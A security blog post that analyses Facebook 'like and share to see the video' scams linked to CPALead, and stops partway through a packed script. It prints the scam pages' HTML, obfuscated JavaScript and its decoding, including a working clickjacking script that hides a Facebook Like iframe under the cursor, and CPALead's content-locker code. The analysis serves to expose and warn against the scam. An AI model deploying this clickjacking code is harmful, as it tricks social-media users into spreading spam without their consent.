Results tagged “malware” from Just Another Hacker

More CPALead facebook abuse

|
It's not really surprising that these guys are still at it, I wacpalead-like-spam-norsk.PNGs howerver a little surprised to see that they have branched out into region specific apps and pages. Perhaps it helps avoid detection? The text in the image is norwegian and translates to "Teenage mum arrested after having uploaded a digusting video of her child" and "see the video".

Looks like fun, so we look behind the curtain.
linux:~$ GET http://tinlike.info/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt</title>
<meta name="description" content="Tenåringsmamma ble arrestert og satt i fengsel etter å ha lastet opp motbydelig video av sin to år gamle datter!"><meta property="og:site_name" content="Se videoen!"/>
<meta property="og:title" content="Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt"/>
<meta property="og:url" content="http://tinlike.info/"/>
<meta property="og:image" content="http://i51.tinypic.com/716ako.jpg"/>
<meta property="og:description" content="Tenåringsmamma ble arrestert og satt i fengsel etter å ha lastet opp motbydelig video av sin to år gamle datter!"/>
<meta property="og:type" content="website" />
<meta property="fb:app_id" content="149463805092381"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link href="/css/style.css" rel="stylesheet" type="text/css" />

</head>
<body>
<div id="fb-root"></div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
<script type="text/javascript" src="jquery.js"></script>

    <div id="header2">
            <h1 class="h1pages" align="center">Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt!</h1>
</div>
<div class="capwrap">
    <div class="grid2col">
        <div>
            <div style="width:920px"><div class="right" style="width:800px;margin-right:50px;">
            <center <img src="http://tinlike.info/images/2q1rwjk.jpg"> </center>
              </div>


              </div>
            <div class="left">
                          <div align="center">
                            <h1 style="color:#FF0000;">Tenåringsmamma ble arrestert og satt i fengsel etter å ha lastet opp motbydelig video av sin to år gamle datter!</h1>
                            <p><br>
                            Følg de <strong>enkle stegene</strong> nedenfor for å se videoen (det tar bare 10 sekunder!) </p>
                            <img src="http://i33.tinypic.com/2emfn0p.png">
<noscript>Please enable JavaScript in your browser to continue.</noscript>
                          </div>
                          <div id="step1" align="center"><div class="step">
                            <h2 class="h2page"s>Steg 1 - Klikk "Like"</h2>
                            <br>

        <div id="like">
                <fb:like font="lucida grande" width="350" show_faces="true" action="like"></fb:like>
        </div>

</div></div>
<div align="center"><div id="step2"><div class="step">
  <h2 class="h2page">Steg 2 - Klikk "Share"</h2>
<br>

        <div id="share">
                <input id="share-button" class="button" type="submit" style="width:100px" value="Share" onclick="share()" />
        </div>
        </div>

                <div id="step3">
                        <form id='fm-content' method="get" action='readko.php'>
                                <input name="hidden" type="hidden" value="hidden" />

                        </form>



</div></div></div>

                        </div></div>

<div class="clear"></div>
</div>
</div>
<div class="maincap bottom"></div>
</div>
<div id="footer-wrap">
           <div id="footer">
                   <p class="left"><script type="text/javascript" src="http://widgets.amung.us/small.js"></script><script type="text/javascript">WAU_small('bx2nllsfxm0a')</script></p><p style="float:right"></p>
         </div></div>

</body>
</html>

Yepp, it's your typical to see the video you must like and share this link rubbish. Lets see what's behind door number two:
linux:~$ GET http://tinlike.info/readko.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=41457&gateid=MTM3MzQ4"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://cpalead.com/adblock.php?pub=41457'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://cpalead.com/nojava.php?pub=41457" /></noscript>
<title>Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
    <div id="header2">
            <h1 class="h1pages" align="center">Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt!</h1>
    </div>
<div class="capwrap">
    <div class="grid2col">
        <div>
<h1 style="color:#FF0000;">Er du nå klar til å se videoen?</h2>
                                        <h1>Etter at du har fullført vår spam/bot kontroll, klikk på knappen nedenfor for å se videoen.</h1>

                                </div>

                                <div id="step1">

                                <br><br><br><br><br><br>
                                <center><SCRIPT LANGUAGE="JavaScript">

var OpenWindow;
var windowprops = "toolbar=0,location=0,directories=0,status=0, " + "menubar=0,scrollbars=1,resizable=0,width=800,height=600";

function performProcess() {
OpenWindow = window.open("http://tinlike.info/videoo.html", "Videon!", windowprops);
document.yourFormName.submit();
}

</SCRIPT>


<button onClick="performProcess();" type="button"><font size="4">Se videoen!</font></button>

                </div></center>

                        </div>
<div class="clear"></div>
</div>
</div>
<div class="maincap bottom"></div>
</div>
<div id="footer-wrap">
           <div id="footer">
                   <p class="left"><script type="text/javascript" src="http://widgets.amung.us/tab.js"></script><script type="text/javascript">WAU_tab('bx2nllsfxm0a', 'left-middle')</script></p><p style="float:right"></p>
         </div></div>

</body>
And sure, enough, cpalead rears it's ugly head again. The interresting bits with this one was the use of the among.us stat counter in the bait page and delivery page. They are now tracking their clickthrough performance. The use of facebook markup to perform the like and share actions without showing up as a facebook app in the news feed is also neat. I hope facebook plugs this loophole, having apps be anonymous when posting to your wall is just bad news.

The moral of the story boys and girls is that if something "demands" that you click like on facebook you should absolutely NOT click, but rather report the app or page.
rabbithole.png
Today I noticed this one in my facebook feed and thought; that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went.
~$ GET http://craziestattoos.blogspot.com/

<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>

<script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener("load",
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
The blogspot page delivers a access.im link visible as a "skip this add page" image and redirects to http:// allhqpics.com/ the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Lets head further down the burrow
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>  
</body>
Looks pretty normal, right? I took a look at the jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings
~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
Decoding that string gives us:
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 500);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" ) 
    {
        clearInterval(interval);
        iflag=1;
        document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; 
    }    
}  
        </script>
I'll get back to the second html page in a bit, first lets check bottom.js from the first page:
~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
Which decodes to:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event) 
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    } 
    else 
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
        else
        {
        icontainer.style.display = 'none'; }
    }

    </script>
This gets a little more interesting, now there is a CSRF request to facebook for you to like the malicious site and lure more unsuspecting victims. It's time to pick up the pace and move on.
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>  
</body>
And the reference to cpalead gives it away. That url delivers your typical function(p,a,c,k,e,d) obfuscated javascript which we decode using the tom liston method
function showme(txt) {
	document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); 
}

//Copyright 2010 CPAlead.com

showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37|dontscro